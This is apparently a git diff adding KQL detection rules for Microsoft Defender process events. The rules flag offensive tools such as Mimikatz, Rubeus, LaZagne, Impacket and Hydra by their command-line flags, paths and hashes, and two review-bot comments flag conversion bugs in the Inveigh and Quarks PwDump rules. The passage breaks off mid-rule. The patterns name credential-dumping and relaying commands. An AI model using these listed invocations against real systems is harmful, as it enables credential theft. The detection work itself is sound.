@@ -0,0 +1,10 @@ +// Title: HackTool - Htran/NATBypass Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090, attack.s0040 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql new file mode 100644 index 00000000..8de64364 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Hydra Password Bruteforce Execution +// Author: Vasiliy Burov +// Date: 2020-10-05 +// Level: high +// Description: Detects command line parameters used by Hydra password guessing hack tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110, attack.t1110.001 +// False Positives: +// - Software that uses the caret encased keywords PASS and USER in its command line + +DeviceProcessEvents +| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql new file mode 100644 index 00000000..1bc4a784 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - Impacket Tools Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-24 +// Level: high +// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 +// False Positives: +// - Legitimate use of the impacket tools + +DeviceProcessEvents +| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or 
FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql new file mode 100644 index 00000000..d9676e34 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Impersonate Execution +// Author: Sai Prashanth Pulisetti @pulisettis +// Date: 2022-12-21 +// Level: medium +// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql new file mode 100644 index 00000000..22c86a54 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - Inveigh Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql new file mode 100644 index 00000000..a5476d32 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql 
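Review bot: The clause `ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")` in the Inveigh rule can never match, because the PE OriginalFilename resource is a bare file name with no path separator; the leading backslash makes the clause dead and detection silently falls back to the FolderPath, FileDescription and command-line flag terms. Whether the backslashes originate in the upstream Sigma rule or in the converter's handling of this field is not visible here, but the emitted KQL should read `ProcessVersionInfoOriginalFileName in~ ("Inveigh.exe", "Inveigh.dll")`, which is how the other rules in this commit compare the same field (for example the EDRSilencer and KrbRelay rules). If the converter is the source, fixing it there keeps the next scheduled run from reintroducing the dead clause.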
@@ -0,0 +1,10 @@ +// Title: HackTool - Jlaive In-Memory Assembly Execution +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-24 +// Level: medium +// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql new file mode 100644 index 00000000..2470610e --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Koadic Execution +// Author: wagga, Jonhnathan Ribeiro, oscd.community +// Date: 2020-01-12 +// Level: high +// Description: Detects command line parameters used by Koadic hack tool +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql new file mode 100644 index 00000000..49d8fb86 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - KrbRelay Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the use of KrbRelay, a Kerberos relaying tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql new file mode 100644 index 00000000..98a34c4e --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - KrbRelayUp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-26 +// Level: high +// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql new file mode 100644 index 00000000..1a421573 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql 
@@ -0,0 +1,13 @@ +// Title: HackTool - LaZagne Execution +// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. +// LaZagne has been leveraged multiple times by threat actors in order to dump credentials. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access +// False Positives: +// - Some false positive is expected from tools with similar command line flags. + +DeviceProcessEvents +| where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or 
FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or 
ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains "-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql new file mode 100644 index 00000000..51120b1c --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - Mimikatz Execution +// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton +// Date: 2019-10-22 +// Level: high +// Description: Detection well-known mimikatz command line arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql new file mode 100644 index 00000000..f0e70f52 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - PCHunter Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2022-10-10 +// Level: high +// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql new file mode 100644 index 00000000..664ddad5 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - Potential Impacket Lateral Movement Activity +// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch +// Date: 2019-09-03 +// Level: high +// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql new file mode 100644 index 00000000..cb3a9825 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - PowerTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-29 +// Level: high +// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql new file mode 100644 index 00000000..1e1b3d91 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - PurpleSharp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-18 +// Level: critical +// Description: Detects the execution of the PurpleSharp adversary simulation tool +// MITRE Tactic: Resource Development +// Tags: attack.t1587, attack.resource-development +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql new file mode 100644 index 00000000..6a049c08 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - Pypykatz Credentials Dumping Activity +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql new file mode 100644 index 00000000..38dbfc39 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Quarks PwDump Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Quarks PwDump tool via commandline arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql new file mode 100644 index 00000000..7d633d59 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql 
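Review bot: In the Quarks PwDump rule, `ProcessCommandLine in~ (" -dhl", " --dump-hash-local", ...)` is a whole-string equality test, so a real command line that also carries the executable name never equals any listed value; only `FolderPath endswith "\\QuarksPwDump.exe"` can fire, and a renamed binary is not caught at all. The source rule presumably expresses these as command-line substring matches, so the converted line should use an or-chain of `ProcessCommandLine contains " -dhl" or ProcessCommandLine contains " --dump-hash-local" or ...` terms, as the other rules in this commit do (the Rubeus rule is a direct example). The mixed leading and trailing spaces in the values (`" -dhd "`, `"--ntds-file"`) look carried over from upstream and can stay once `contains` is used; the list-to-`in~` conversion is worth checking in the converter since any other rule with a `contains` list on this field would be broken the same way.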
@@ -0,0 +1,10 @@ +// Title: HackTool - RedMimicry Winnti Playbook Execution +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql new file mode 100644 index 00000000..fe699bbb --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - RemoteKrbRelay Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword ")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql new file mode 100644 index 00000000..5a850327 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql 
@@ -0,0 +1,12 @@
+// Title: HackTool - Rubeus Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
new file mode 100644
index 00000000..0ee7f2e0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-20
+// Level: critical
+// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
new file mode 100644
index 00000000..75abef80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SecurityXploded Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of SecurityXploded Tools
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
new file mode 100644
index 00000000..c3d5e371
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpChisel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
